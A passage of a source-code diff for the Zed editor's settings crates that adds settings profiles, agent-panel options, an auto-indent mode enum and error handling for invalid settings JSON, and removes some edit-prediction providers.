&self.merged_settings + } + /// Get the value of a setting. /// /// Panics if the given setting type has not been registered, or if there is no @@ -544,9 +546,9 @@ impl SettingsStore { update: impl 'static + Send + FnOnce(&mut SettingsContent, &App), ) { _ = self.update_settings_file_inner(fs, move |old_text: String, cx: AsyncApp| { - Ok(cx.read_global(|store: &SettingsStore, cx| { + cx.read_global(|store: &SettingsStore, cx| { store.new_text_for_update(old_text, |content| update(content, cx)) - })) + }) }); } @@ -556,9 +558,9 @@ impl SettingsStore { vscode_settings: VsCodeSettings, ) -> oneshot::Receiver> { self.update_settings_file_inner(fs, move |old_text: String, cx: AsyncApp| { - Ok(cx.read_global(|store: &SettingsStore, _cx| { + cx.read_global(|store: &SettingsStore, _cx| { store.get_vscode_edits(old_text, &vscode_settings) - })) + }) }) } @@ -749,16 +751,16 @@ impl SettingsStore { &self, old_text: String, update: impl FnOnce(&mut SettingsContent), - ) -> String { - let edits = self.edits_for_update(&old_text, update); + ) -> Result { + let edits = self.edits_for_update(&old_text, update)?; let mut new_text = old_text; for (range, replacement) in edits.into_iter() { new_text.replace_range(range, &replacement); } - new_text + Ok(new_text) } - pub fn get_vscode_edits(&self, old_text: String, vscode: &VsCodeSettings) -> String { + pub fn get_vscode_edits(&self, old_text: String, vscode: &VsCodeSettings) -> Result { self.new_text_for_update(old_text, |content| { content.merge_from(&vscode.settings_content()) }) @@ -770,10 +772,17 @@ impl SettingsStore { &self, text: &str, update: impl FnOnce(&mut SettingsContent), - ) -> Vec<(Range, String)> { - let old_content = UserSettingsContent::parse_json_with_comments(text) - .log_err() - .unwrap_or_default(); + ) -> Result, String)>> { + let old_content = if text.trim().is_empty() { + UserSettingsContent::default() + } else { + let (old_content, parse_status) = UserSettingsContent::parse_json(text); + if let ParseStatus::Failed { error } = &parse_status { + log::error!("Failed to parse settings for update: {error}"); + } + old_content + .context("Settings file could not be parsed. Fix syntax errors before updating.")? + }; let mut new_content = old_content.clone(); update(&mut new_content.content); @@ -792,7 +801,18 @@ impl SettingsStore { &new_value, &mut edits, ); - edits + Ok(edits) + } + + /// Mutates the default settings in place and recomputes all setting values. + pub fn update_default_settings( + &mut self, + cx: &mut App, + update: impl FnOnce(&mut SettingsContent), + ) { + let default_settings = Rc::make_mut(&mut self.default_settings); + update(default_settings); + self.recompute_values(None, cx); } /// Sets the default settings via a JSON string. @@ -868,18 +888,30 @@ impl SettingsStore { /// Sets language-specific semantic token rules. /// /// These rules are registered by language modules (e.g. the Rust language module) - /// and are stored separately from the global rules. They are only applied to - /// buffers of the matching language by the `SemanticTokenStylizer`. + /// or by third-party extensions (via `semantic_token_rules.json` in their language + /// directories). They are stored separately from the global rules and are only + /// applied to buffers of the matching language by the `SemanticTokenStylizer`. /// - /// These should be registered before any `SemanticTokenStylizer` instances are - /// created (typically during `languages::init`), as existing cached stylizers - /// are not automatically invalidated. + /// This triggers a settings recomputation so that observers (e.g. `LspStore`) + /// are notified and can invalidate cached stylizers. pub fn set_language_semantic_token_rules( &mut self, language: SharedString, rules: SemanticTokenRules, + cx: &mut App, ) { self.language_semantic_token_rules.insert(language, rules); + self.recompute_values(None, cx); + } + + /// Removes language-specific semantic token rules for the given language. + /// + /// This should be called when an extension that registered rules for a language + /// is unloaded. Triggers a settings recomputation so that observers (e.g. + /// `LspStore`) are notified and can invalidate cached stylizers. + pub fn remove_language_semantic_token_rules(&mut self, language: &str, cx: &mut App) { + self.language_semantic_token_rules.remove(language); + self.recompute_values(None, cx); } /// Returns the language-specific semantic token rules for the given language, @@ -1178,10 +1210,19 @@ impl SettingsStore { merged.merge_from_option(self.extension_settings.as_deref()); merged.merge_from_option(self.global_settings.as_deref()); if let Some(user_settings) = self.user_settings.as_ref() { - merged.merge_from(&user_settings.content); - merged.merge_from_option(user_settings.for_release_channel()); - merged.merge_from_option(user_settings.for_os()); - merged.merge_from_option(user_settings.for_profile(cx)); + let active_profile = user_settings.for_profile(cx); + let should_merge_user_settings = + active_profile.is_none_or(|profile| profile.base == ProfileBase::User); + + if should_merge_user_settings { + merged.merge_from(&user_settings.content); + merged.merge_from_option(user_settings.for_release_channel()); + merged.merge_from_option(user_settings.for_os()); + } + + if let Some(profile) = active_profile { + merged.merge_from(&profile.settings); + } } merged.merge_from_option(self.server_settings.as_deref()); @@ -1399,9 +1440,7 @@ impl std::fmt::Display for InvalidSettingsError { | InvalidSettingsError::DefaultSettings { message } | InvalidSettingsError::Tasks { message, .. } | InvalidSettingsError::Editorconfig { message, .. } - | InvalidSettingsError::Debug { message, .. } => { - write!(f, "{message}") - } + | InvalidSettingsError::Debug { message, .. } => write!(f, "{message}"), } } } @@ -1678,7 +1717,7 @@ mod tests { cx: &mut App, ) { store.set_user_settings(&old_json, cx).ok(); - let edits = store.edits_for_update(&old_json, update); + let edits = store.edits_for_update(&old_json, update).unwrap(); let mut new_json = old_json; for (range, replacement) in edits.into_iter() { new_json.replace_range(range, &replacement); @@ -1696,7 +1735,7 @@ mod tests { r#"{ "languages": { "JSON": { - "auto_indent": true + "auto_indent": "syntax_aware" } } }"# @@ -1706,12 +1745,12 @@ mod tests { .languages_mut() .get_mut("JSON") .unwrap() - .auto_indent = Some(false); + .auto_indent = Some(crate::AutoIndentMode::None); settings.languages_mut().insert( "Rust".into(), LanguageSettingsContent { - auto_indent: Some(true), + auto_indent: Some(crate::AutoIndentMode::SyntaxAware), ..Default::default() }, ); @@ -1719,10 +1758,10 @@ mod tests { r#"{ "languages": { "Rust": { - "auto_indent": true + "auto_indent": "syntax_aware" }, "JSON": { - "auto_indent": false + "auto_indent": "none" } } }"# @@ -1866,6 +1905,39 @@ mod tests { ); } + #[gpui::test] + fn test_edits_for_update_preserves_unknown_keys(cx: &mut App) { + let mut store = SettingsStore::new(cx, &test_settings()); + store.register_setting::(); + + let old_json = r#"{ + "some_unknown_key": "should_be_preserved", + "auto_update": false + }"# + .unindent(); + + check_settings_update( + &mut store, + old_json, + |settings| settings.auto_update = Some(true), + r#"{ + "some_unknown_key": "should_be_preserved", + "auto_update": true + }"# + .unindent(), + cx, + ); + } + + #[gpui::test] + fn test_edits_for_update_returns_error_on_invalid_json(cx: &mut App) { + let store = SettingsStore::new(cx, &test_settings()); + + let invalid_json = r#"{ this is not valid json at all !!!"#; + let result = store.edits_for_update(invalid_json, |_| {}); + assert!(result.is_err()); + } + #[gpui::test] fn test_vscode_import(cx: &mut App) { let mut store = SettingsStore::new(cx, &test_settings()); @@ -1986,10 +2058,12 @@ mod tests { cx: &mut App, ) { store.set_user_settings(&old, cx).ok(); - let new = store.get_vscode_edits( - old, - &VsCodeSettings::from_str(&vscode, VsCodeSettingsSource::VsCode).unwrap(), - ); + let new = store + .get_vscode_edits( + old, + &VsCodeSettings::from_str(&vscode, VsCodeSettingsSource::VsCode).unwrap(), + ) + .unwrap(); pretty_assertions::assert_eq!(new, expected); } @@ -1997,14 +2071,16 @@ mod tests { fn test_update_git_settings(cx: &mut App) { let store = SettingsStore::new(cx, &test_settings()); - let actual = store.new_text_for_update("{}".to_string(), |current| { - current - .git - .get_or_insert_default() - .inline_blame - .get_or_insert_default() - .enabled = Some(true); - }); + let actual = store + .new_text_for_update("{}".to_string(), |current| { + current + .git + .get_or_insert_default() + .inline_blame + .get_or_insert_default() + .enabled = Some(true); + }) + .unwrap(); pretty_assertions::assert_str_eq!( actual, r#"{ diff --git a/crates/settings/src/vscode_import.rs b/crates/settings/src/vscode_import.rs index 8a5a497d265c02787d6944915c0dba56e2381a79..1211cbd8a4519ea295773eb0d979b48258908311 100644 --- a/crates/settings/src/vscode_import.rs +++ b/crates/settings/src/vscode_import.rs @@ -219,6 +219,7 @@ impl VsCodeSettings { vim_mode: None, workspace: self.workspace_settings_content(), which_key: None, + modeline_lines: None, } } @@ -307,6 +308,7 @@ impl VsCodeSettings { completion_menu_scrollbar: None, completion_detail_alignment: None, diff_view_style: None, + minimum_split_diff_width: None, } } @@ -507,7 +509,6 @@ impl VsCodeSettings { context_servers: self.context_servers(), context_server_timeout: None, load_direnv: None, - slash_commands: None, git_hosting_providers: None, disable_ai: None, } @@ -768,6 +769,7 @@ impl VsCodeSettings { fn status_bar_settings_content(&self) -> Option { skip_default(StatusBarSettingsContent { show: self.read_bool("workbench.statusBar.visible"), + show_active_file: None, active_language_button: None, cursor_position_button: None, line_endings_button: None, @@ -793,7 +795,12 @@ impl VsCodeSettings { hide_root: None, indent_guides: None, indent_size: None, - scrollbar: None, + scrollbar: self.read_bool("workbench.list.horizontalScrolling").map( + |horizontal_scrolling| ProjectPanelScrollbarSettingsContent { + show: None, + horizontal_scroll: Some(horizontal_scrolling), + }, + ), show_diagnostics: self .read_bool("problems.decorations.enabled") .and_then(|b| if b { Some(ShowDiagnostics::Off) } else { None }), @@ -802,6 +809,7 @@ impl VsCodeSettings { sticky_scroll: None, auto_open: None, diagnostic_badges: None, + git_status_indicator: None, }; if let (Some(false), Some(false)) = ( @@ -872,6 +880,8 @@ impl VsCodeSettings { scrollbar: None, scroll_multiplier: None, toolbar: None, + show_count_badge: None, + flexible: None, }) } @@ -989,6 +999,7 @@ impl VsCodeSettings { } }), zoomed_padding: None, + focus_follows_mouse: None, } } diff --git a/crates/settings_content/Cargo.toml b/crates/settings_content/Cargo.toml index 1908e6623be5766c1ab8b8a9bb91c67906e7b76c..b3599e9eef3b7ac5680f441369a7cbdc98a5d043 100644 --- a/crates/settings_content/Cargo.toml +++ b/crates/settings_content/Cargo.toml @@ -28,9 +28,3 @@ settings_json.workspace = true settings_macros.workspace = true strum.workspace = true util.workspace = true - -# Uncomment other workspace dependencies as needed -# assistant.workspace = true -# client.workspace = true -# project.workspace = true -# settings.workspace = true diff --git a/crates/settings_content/src/agent.rs b/crates/settings_content/src/agent.rs index 87e117b8b0bbdd9a789bae18c3f9dce98a6f1bc0..5b1b3c014f8c538cb0dff506e05d84a80dc863d1 100644 --- a/crates/settings_content/src/agent.rs +++ b/crates/settings_content/src/agent.rs @@ -9,6 +9,92 @@ use crate::ExtendingVec; use crate::DockPosition; +/// Where new threads should start by default. +#[derive( + Clone, + Copy, + Debug, + Default, + PartialEq, + Eq, + Serialize, + Deserialize, + JsonSchema, + MergeFrom, + strum::VariantArray, + strum::VariantNames, +)] +#[serde(rename_all = "snake_case")] +pub enum NewThreadLocation { + /// Start threads in the current project. + #[default] + LocalProject, + /// Start threads in a new worktree. + NewWorktree, +} + +/// Where to position the sidebar. +#[derive( + Clone, + Copy, + Debug, + Default, + PartialEq, + Eq, + Serialize, + Deserialize, + JsonSchema, + MergeFrom, + strum::VariantArray, + strum::VariantNames, +)] +#[serde(rename_all = "snake_case")] +pub enum SidebarDockPosition { + /// Always show the sidebar on the left side. + #[default] + Left, + /// Always show the sidebar on the right side. + Right, +} + +#[derive(Copy, Clone, Debug, Default, PartialEq, Eq)] +pub enum SidebarSide { + #[default] + Left, + Right, +} + +/// How thinking blocks should be displayed by default in the agent panel. +#[derive( + Clone, + Copy, + Debug, + Default, + PartialEq, + Eq, + Serialize, + Deserialize, + JsonSchema, + MergeFrom, + strum::VariantArray, + strum::VariantNames, +)] +#[serde(rename_all = "snake_case")] +pub enum ThinkingBlockDisplay { + /// Thinking blocks fully expand during streaming, then auto-collapse + /// when the model finishes thinking. Users can re-expand after collapse. + #[default] + Auto, + /// Thinking blocks auto-expand with a height constraint during streaming, + /// then remain in their constrained state when complete. Users can click + /// to fully expand or collapse. + Preview, + /// Thinking blocks are always fully expanded by default (no height constraint). + AlwaysExpanded, + /// Thinking blocks are always collapsed by default. + AlwaysCollapsed, +} + #[with_fallible_options] #[derive(Clone, PartialEq, Serialize, Deserialize, JsonSchema, MergeFrom, Debug, Default)] pub struct AgentSettingsContent { @@ -24,6 +110,14 @@ pub struct AgentSettingsContent { /// /// Default: right pub dock: Option, + /// Whether the agent panel should use flexible (proportional) sizing. + /// + /// Default: true + pub flexible: Option, + /// Where to position the sidebar. + /// + /// Default: left + pub sidebar_side: Option, /// Default width in pixels when the agent panel is docked to the left or right. /// /// Default: 640 @@ -55,20 +149,20 @@ pub struct AgentSettingsContent { /// /// Default: write pub default_profile: Option>, - /// Which view type to show by default in the agent panel. + /// Where new threads should start by default. /// - /// Default: "thread" - pub default_view: Option, + /// Default: "local_project" + pub new_thread_location: Option, /// The available agent profiles. pub profiles: Option, AgentProfileContent>>, /// Where to show a popup notification when the agent is waiting for user input. /// /// Default: "primary_screen" pub notify_when_agent_waiting: Option, - /// Whether to play a sound when the agent has either completed its response, or needs user input. + /// When to play a sound when the agent has either completed its response, or needs user input. /// - /// Default: false - pub play_sound_when_agent_done: Option, + /// Default: never + pub play_sound_when_agent_done: Option, /// Whether to display agent edits in single-file editors in addition to the review multibuffer pane. /// /// Default: true @@ -94,6 +188,10 @@ pub struct AgentSettingsContent { /// /// Default: true pub expand_terminal_card: Option, + /// How thinking blocks should be displayed by default in the agent panel. + /// + /// Default: automatic + pub thinking_display: Option, /// Whether clicking the stop button on a running terminal tool should also cancel the agent's generation. /// Note that this only applies to the stop button, not to ctrl+c inside the terminal. /// @@ -111,6 +209,11 @@ pub struct AgentSettingsContent { /// /// Default: false pub show_turn_stats: Option, + /// Whether to show the merge conflict indicator in the status bar + /// that offers to resolve conflicts using the agent. + /// + /// Default: true + pub show_merge_conflict_indicator: Option, /// Per-tool permission rules for granular control over which tool actions /// require confirmation. /// @@ -129,6 +232,14 @@ impl AgentSettingsContent { self.dock = Some(dock); } + pub fn set_sidebar_side(&mut self, position: SidebarDockPosition) { + self.sidebar_side = Some(position); + } + + pub fn set_flexible_size(&mut self, flexible: bool) { + self.flexible = Some(flexible); + } + pub fn set_model(&mut self, language_model: LanguageModelSelection) { self.default_model = Some(language_model) } @@ -146,6 +257,10 @@ impl AgentSettingsContent { self.default_profile = Some(profile_id); } + pub fn set_new_thread_location(&mut self, value: NewThreadLocation) { + self.new_thread_location = Some(value); + } + pub fn add_favorite_model(&mut self, model: LanguageModelSelection) { if !self.favorite_models.contains(&model) { self.favorite_models.push(model); @@ -216,12 +331,25 @@ pub struct ContextServerPresetContent { pub tools: IndexMap, bool>, } -#[derive(Copy, Clone, Default, Debug, PartialEq, Serialize, Deserialize, JsonSchema, MergeFrom)] +#[derive( + Copy, + Clone, + Default, + Debug, + Serialize, + Deserialize, + JsonSchema, + MergeFrom, + PartialEq, + strum::VariantArray, + strum::VariantNames, +)] #[serde(rename_all = "snake_case")] -pub enum DefaultAgentView { +pub enum NotifyWhenAgentWaiting { #[default] - Thread, - TextThread, + PrimaryScreen, + AllScreens, + Never, } #[derive( @@ -238,11 +366,21 @@ pub enum DefaultAgentView { strum::VariantNames, )] #[serde(rename_all = "snake_case")] -pub enum NotifyWhenAgentWaiting { +pub enum PlaySoundWhenAgentDone { #[default] - PrimaryScreen, - AllScreens, Never, + WhenHidden, + Always, +} + +impl PlaySoundWhenAgentDone { + pub fn should_play(&self, visible: bool) -> bool { + match self { + PlaySoundWhenAgentDone::Never => false, + PlaySoundWhenAgentDone::WhenHidden => !visible, + PlaySoundWhenAgentDone::Always => true, + } + } } #[with_fallible_options] diff --git a/crates/settings_content/src/editor.rs b/crates/settings_content/src/editor.rs index 4d824e85e0e2ee020f48cdddb530bf494b2ce800..b37192882694f999a5e7f3180e5a7899a8732393 100644 --- a/crates/settings_content/src/editor.rs +++ b/crates/settings_content/src/editor.rs @@ -226,6 +226,14 @@ pub struct EditorSettingsContent { /// /// Default: split pub diff_view_style: Option, + + /// The minimum width (in em-widths) at which the split diff view is used. + /// When the editor is narrower than this, the diff view automatically + /// switches to unified mode and switches back when the editor is wide + /// enough. Set to 0 to disable automatic switching. + /// + /// Default: 100 + pub minimum_split_diff_width: Option, } #[derive( diff --git a/crates/settings_content/src/language.rs b/crates/settings_content/src/language.rs index ab526c405a4b34962c298d68365cb828975628b1..c818ca431e8c651affe511fba0e66fcbb388f5ee 100644 --- a/crates/settings_content/src/language.rs +++ b/crates/settings_content/src/language.rs @@ -81,17 +81,15 @@ pub enum EditPredictionProvider { None, #[default] Copilot, - Supermaven, Zed, Codestral, Ollama, OpenAiCompatibleApi, - Sweep, Mercury, Experimental(&'static str), } -pub const EXPERIMENTAL_ZETA2_EDIT_PREDICTION_PROVIDER_NAME: &str = "zeta2"; +const EXPERIMENTAL_ZETA2_EDIT_PREDICTION_PROVIDER_NAME: &str = "zeta2"; impl<'de> Deserialize<'de> for EditPredictionProvider { fn deserialize(deserializer: D) -> Result @@ -103,12 +101,10 @@ impl<'de> Deserialize<'de> for EditPredictionProvider { pub enum Content { None, Copilot, - Supermaven, Zed, Codestral, Ollama, OpenAiCompatibleApi, - Sweep, Mercury, Experimental(String), } @@ -116,19 +112,15 @@ impl<'de> Deserialize<'de> for EditPredictionProvider { Ok(match Content::deserialize(deserializer)? { Content::None => EditPredictionProvider::None, Content::Copilot => EditPredictionProvider::Copilot, - Content::Supermaven => EditPredictionProvider::Supermaven, Content::Zed => EditPredictionProvider::Zed, Content::Codestral => EditPredictionProvider::Codestral, Content::Ollama => EditPredictionProvider::Ollama, Content::OpenAiCompatibleApi => EditPredictionProvider::OpenAiCompatibleApi, - Content::Sweep => EditPredictionProvider::Sweep, Content::Mercury => EditPredictionProvider::Mercury, Content::Experimental(name) if name == EXPERIMENTAL_ZETA2_EDIT_PREDICTION_PROVIDER_NAME => { - EditPredictionProvider::Experimental( - EXPERIMENTAL_ZETA2_EDIT_PREDICTION_PROVIDER_NAME, - ) + EditPredictionProvider::Zed } Content::Experimental(name) => { return Err(D::Error::custom(format!( @@ -146,11 +138,9 @@ impl EditPredictionProvider { EditPredictionProvider::Zed => true, EditPredictionProvider::None | EditPredictionProvider::Copilot - | EditPredictionProvider::Supermaven | EditPredictionProvider::Codestral | EditPredictionProvider::Ollama | EditPredictionProvider::OpenAiCompatibleApi - | EditPredictionProvider::Sweep | EditPredictionProvider::Mercury | EditPredictionProvider::Experimental(_) => false, } @@ -160,14 +150,9 @@ impl EditPredictionProvider { match self { EditPredictionProvider::Zed => Some("Zed AI"), EditPredictionProvider::Copilot => Some("GitHub Copilot"), - EditPredictionProvider::Supermaven => Some("Supermaven"), EditPredictionProvider::Codestral => Some("Codestral"), - EditPredictionProvider::Sweep => Some("Sweep"), EditPredictionProvider::Mercury => Some("Mercury"), - EditPredictionProvider::Experimental( - EXPERIMENTAL_ZETA2_EDIT_PREDICTION_PROVIDER_NAME, - ) => Some("Zeta2"), - EditPredictionProvider::None | EditPredictionProvider::Experimental(_) => None, + EditPredictionProvider::Experimental(_) | EditPredictionProvider::None => None, EditPredictionProvider::Ollama => Some("Ollama"), EditPredictionProvider::OpenAiCompatibleApi => Some("OpenAI-Compatible API"), } @@ -191,15 +176,10 @@ pub struct EditPredictionSettingsContent { pub copilot: Option, /// Settings specific to Codestral. pub codestral: Option, - /// Settings specific to Sweep. - pub sweep: Option, /// Settings specific to Ollama. pub ollama: Option, /// Settings specific to using custom OpenAI-compatible servers for edit prediction. pub open_ai_compatible_api: Option, - /// Whether edit predictions are enabled in the assistant prompt editor. - /// This has no effect if globally disabled. - pub enabled_in_text_threads: Option, /// The directory where manually captured edit prediction examples are stored. pub examples_dir: Option>, } @@ -219,8 +199,7 @@ pub struct CustomEditPredictionProviderSettingsContent { /// /// Default: "" pub model: Option, - /// Maximum tokens to generate for FIM models. - /// This setting does not apply to sweep models. + /// Maximum tokens to generate. /// /// Default: 256 pub max_output_tokens: Option, @@ -245,6 +224,7 @@ pub enum EditPredictionPromptFormat { #[default] Infer, Zeta, + Zeta2, CodeLlama, StarCoder, DeepseekCoder, @@ -292,18 +272,6 @@ pub struct CodestralSettingsContent { pub api_url: Option, } -#[with_fallible_options] -#[derive(Clone, Debug, Default, Serialize, Deserialize, JsonSchema, MergeFrom, PartialEq)] -pub struct SweepSettingsContent { - /// When enabled, Sweep will not store edit prediction inputs or outputs. - /// When disabled, Sweep may collect data including buffer contents, - /// diagnostics, file paths, repository names, and generated predictions - /// to improve the service. - /// - /// Default: false - pub privacy_mode: Option, -} - /// Ollama model name for edit predictions. #[with_fallible_options] #[derive(Clone, Debug, Serialize, Deserialize, JsonSchema, MergeFrom, PartialEq, Eq)] @@ -336,7 +304,6 @@ pub struct OllamaEditPredictionSettingsContent { /// Default: none pub model: Option, /// Maximum tokens to generate for FIM models. - /// This setting does not apply to sweep models. /// /// Default: 256 pub max_output_tokens: Option, @@ -378,6 +345,32 @@ pub enum EditPredictionsMode { Eager, } +/// Controls the soft-wrapping behavior in the editor. +#[derive( + Copy, + Clone, + Debug, + Serialize, + Deserialize, + PartialEq, + Eq, + JsonSchema, + MergeFrom, + strum::VariantArray, + strum::VariantNames, +)] +#[serde(rename_all = "snake_case")] +pub enum AutoIndentMode { + /// Adjusts indentation based on syntax context when typing. + /// Uses tree-sitter to analyze code structure and indent accordingly. + SyntaxAware, + /// Preserve the indentation of the current line when creating new lines, + /// but don't adjust based on syntax context. + PreserveIndent, + /// No automatic indentation. New lines start at column 0. + None, +} + /// Controls the soft-wrapping behavior in the editor. #[derive( Copy, @@ -580,10 +573,14 @@ pub struct LanguageSettingsContent { /// /// Default: true pub linked_edits: Option, - /// Whether indentation should be adjusted based on the context whilst typing. + /// Controls automatic indentation behavior when typing. /// - /// Default: true - pub auto_indent: Option, + /// - "syntax_aware": Adjusts indentation based on syntax context (default) + /// - "preserve_indent": Preserves current line's indentation on new lines + /// - "none": No automatic indentation + /// + /// Default: syntax_aware + pub auto_indent: Option, /// Whether indentation of pasted content should be adjusted based on the context. /// /// Default: true @@ -934,6 +931,8 @@ pub enum Formatter { /// or falling back to formatting via language server. #[default] Auto, + /// Do not format code. + None, /// Format code using Zed's Prettier integration. Prettier, /// Format code using an external command. @@ -1127,6 +1126,12 @@ mod test { settings.formatter, Some(FormatterList::Single(Formatter::Auto)) ); + let raw_none = "{\"formatter\": \"none\"}"; + let settings: LanguageSettingsContent = serde_json::from_str(raw_none).unwrap(); + assert_eq!( + settings.formatter, + Some(FormatterList::Single(Formatter::None)) + ); let raw = "{\"formatter\": \"language_server\"}"; let settings: LanguageSettingsContent = serde_json::from_str(raw).unwrap(); assert_eq!( diff --git a/crates/settings_content/src/language_model.rs b/crates/settings_content/src/language_model.rs index 6af419119d819931f3ad826ff416f1b47c89824f..4b72c2ad3f47d834dfa38555d80a8646e3940f51 100644 --- a/crates/settings_content/src/language_model.rs +++ b/crates/settings_content/src/language_model.rs @@ -16,6 +16,7 @@ pub struct AllLanguageModelSettingsContent { pub lmstudio: Option, pub mistral: Option, pub ollama: Option, + pub opencode: Option, pub open_router: Option, pub openai: Option, pub openai_compatible: Option, OpenAiCompatibleSettingsContent>>, @@ -144,10 +145,29 @@ impl Default for KeepAlive { } } +#[with_fallible_options] +#[derive(Default, Clone, Debug, Serialize, Deserialize, PartialEq, JsonSchema, MergeFrom)] +pub struct OpenCodeSettingsContent { + pub api_url: Option, + pub available_models: Option>, +} + +#[with_fallible_options] +#[derive(Clone, Debug, PartialEq, Serialize, Deserialize, JsonSchema, MergeFrom)] +pub struct OpenCodeAvailableModel { + pub name: String, + pub display_name: Option, + pub max_tokens: u64, + pub max_output_tokens: Option, + /// The API protocol to use for this model: "anthropic", "openai_responses", "openai_chat", or "google". + pub protocol: String, +} + #[with_fallible_options] #[derive(Default, Clone, Debug, Serialize, Deserialize, PartialEq, JsonSchema, MergeFrom)] pub struct LmStudioSettingsContent { pub api_url: Option, + pub api_key: Option, pub available_models: Option>, } @@ -258,6 +278,7 @@ pub struct OpenAiCompatibleAvailableModel { pub max_tokens: u64, pub max_output_tokens: Option, pub max_completion_tokens: Option, + pub reasoning_effort: Option, #[serde(default)] pub capabilities: OpenAiCompatibleModelCapabilities, } diff --git a/crates/settings_content/src/project.rs b/crates/settings_content/src/project.rs index 70544646b1878c163bf5c17d2364eeebd98f6908..6e8b296ef21efa838833038582de82b3ebc4f28b 100644 --- a/crates/settings_content/src/project.rs +++ b/crates/settings_content/src/project.rs @@ -1,5 +1,9 @@ -use std::{path::PathBuf, sync::Arc}; +use std::{ + path::{Path, PathBuf}, + sync::Arc, +}; +use anyhow::Context; use collections::{BTreeMap, HashMap}; use gpui::Rgba; use schemars::JsonSchema; @@ -10,7 +14,7 @@ use util::serde::default_true; use crate::{ AllLanguageSettingsContent, DelayMs, ExtendingVec, ParseStatus, ProjectTerminalSettingsContent, - RootUserSettings, SaturatingBool, SlashCommandSettings, fallible_options, + RootUserSettings, SaturatingBool, fallible_options, }; #[with_fallible_options] @@ -74,9 +78,6 @@ pub struct ProjectSettingsContent { /// Configuration for how direnv configuration should be loaded pub load_direnv: Option, - /// Settings for slash commands. - pub slash_commands: Option, - /// The list of custom Git hosting providers. pub git_hosting_providers: Option>, @@ -233,6 +234,26 @@ pub struct SemanticTokenRules { pub rules: Vec, } +impl SemanticTokenRules { + pub const FILE_NAME: &'static str = "semantic_token_rules.json"; + + pub fn load(file_path: &Path) -> anyhow::Result { + let rules_content = std::fs::read(file_path).with_context(|| { + anyhow::anyhow!( + "Could not read semantic token rules from {}", + file_path.display() + ) + })?; + + serde_json_lenient::from_slice::(&rules_content).with_context(|| { + anyhow::anyhow!( + "Failed to parse semantic token rules from {}", + file_path.display() + ) + }) + } +} + impl crate::merge_from::MergeFrom for SemanticTokenRules { fn merge_from(&mut self, other: &Self) { self.rules.splice(0..0, other.rules.iter().cloned()); @@ -255,6 +276,18 @@ pub struct SemanticTokenRule { pub font_style: Option, } +impl SemanticTokenRule { + pub fn no_style_defined(&self) -> bool { + self.style.is_empty() + && self.foreground_color.is_none() + && self.background_color.is_none() + && self.underline.is_none() + && self.strikethrough.is_none() + && self.font_weight.is_none() + && self.font_style.is_none() + } +} + #[derive(Copy, Clone, Debug, Serialize, Deserialize, PartialEq, JsonSchema, MergeFrom)] #[serde(untagged)] pub enum SemanticTokenColorOverride { diff --git a/crates/settings_content/src/settings_content.rs b/crates/settings_content/src/settings_content.rs index f94c6a0b98d7fa23686dc1c89012e3b1fe476c70..6c60a7010f7cfc5b4fadf9a8cc386fe6e3267abc 100644 --- a/crates/settings_content/src/settings_content.rs +++ b/crates/settings_content/src/settings_content.rs @@ -9,6 +9,7 @@ mod project; mod serde_helper; mod terminal; mod theme; +mod title_bar; mod workspace; pub use agent::*; @@ -26,6 +27,7 @@ pub use serde_helper::{ use settings_json::parse_json_with_comments; pub use terminal::*; pub use theme::*; +pub use title_bar::*; pub use workspace::*; use collections::{HashMap, IndexMap}; @@ -63,7 +65,8 @@ macro_rules! settings_overrides { } } } -use std::collections::BTreeSet; +use std::collections::{BTreeMap, BTreeSet}; +use std::hash::Hash; use std::sync::Arc; pub use util::serde::default_true; @@ -202,6 +205,13 @@ pub struct SettingsContent { /// Settings related to Vim mode in Zed. pub vim: Option, + + /// Number of lines to search for modelines at the beginning and end of files. + /// Modelines contain editor directives (e.g., vim/emacs settings) that configure + /// the editor behavior for specific files. + /// + /// Default: 5 + pub modeline_lines: Option, } impl SettingsContent { @@ -255,6 +265,35 @@ settings_overrides! { pub struct PlatformOverrides { macos, linux, windows } } +/// Determines what settings a profile starts from before applying its overrides. +#[derive( + Debug, Clone, Copy, Default, PartialEq, Eq, Serialize, Deserialize, JsonSchema, MergeFrom, +)] +#[serde(rename_all = "snake_case")] +pub enum ProfileBase { + /// Apply profile settings on top of the user's current settings. + #[default] + User, + /// Apply profile settings on top of Zed's default settings, ignoring user customizations. + Default, +} + +/// A named settings profile that can temporarily override settings. +#[with_fallible_options] +#[derive(Debug, Default, PartialEq, Clone, Serialize, Deserialize, JsonSchema, MergeFrom)] +pub struct SettingsProfile { + /// What base settings to start from before applying this profile's overrides. + /// + /// - `user`: Apply on top of user's settings (default) + /// - `default`: Apply on top of Zed's default settings, ignoring user customizations + #[serde(default)] + pub base: ProfileBase, + + /// The settings overrides for this profile. + #[serde(default)] + pub settings: Box, +} + #[with_fallible_options] #[derive(Debug, Default, PartialEq, Clone, Serialize, Deserialize, JsonSchema, MergeFrom)] pub struct UserSettingsContent { @@ -268,7 +307,7 @@ pub struct UserSettingsContent { pub platform_overrides: PlatformOverrides, #[serde(default)] - pub profiles: IndexMap, + pub profiles: IndexMap, } pub struct ExtensionsSettingsContent { @@ -316,54 +355,10 @@ impl strum::VariantNames for BaseKeymapContent { ]; } -#[with_fallible_options] -#[derive(Clone, PartialEq, Default, Serialize, Deserialize, JsonSchema, MergeFrom, Debug)] -pub struct TitleBarSettingsContent { - /// Whether to show the branch icon beside branch switcher in the title bar. - /// - /// Default: false - pub show_branch_icon: Option, - /// Whether to show onboarding banners in the title bar. - /// - /// Default: true - pub show_onboarding_banner: Option, - /// Whether to show user avatar in the title bar. - /// - /// Default: true - pub show_user_picture: Option, - /// Whether to show the branch name button in the titlebar. - /// - /// Default: true - pub show_branch_name: Option, - /// Whether to show the project host and name in the titlebar. - /// - /// Default: true - pub show_project_items: Option, - /// Whether to show the sign in button in the title bar. - /// - /// Default: true - pub show_sign_in: Option, - /// Whether to show the user menu button in the title bar. - /// - /// Default: true - pub show_user_menu: Option, - /// Whether to show the menus in the title bar. - /// - /// Default: false - pub show_menus: Option, -} - /// Configuration of audio in Zed. #[with_fallible_options] #[derive(Clone, PartialEq, Default, Serialize, Deserialize, JsonSchema, MergeFrom, Debug)] pub struct AudioSettingsContent { - /// Opt into the new audio system. - /// - /// You need to rejoin a call for this setting to apply - #[serde(rename = "experimental.rodio_audio")] - pub rodio_audio: Option, // default is false - /// Requires 'rodio_audio: true' - /// /// Automatically increase or decrease you microphone's volume. This affects how /// loud you sound to others. /// @@ -373,35 +368,11 @@ pub struct AudioSettingsContent { /// compared to other speakers. #[serde(rename = "experimental.auto_microphone_volume")] pub auto_microphone_volume: Option, - /// Requires 'rodio_audio: true' - /// - /// Automatically increate or decrease the volume of other call members. - /// This only affects how 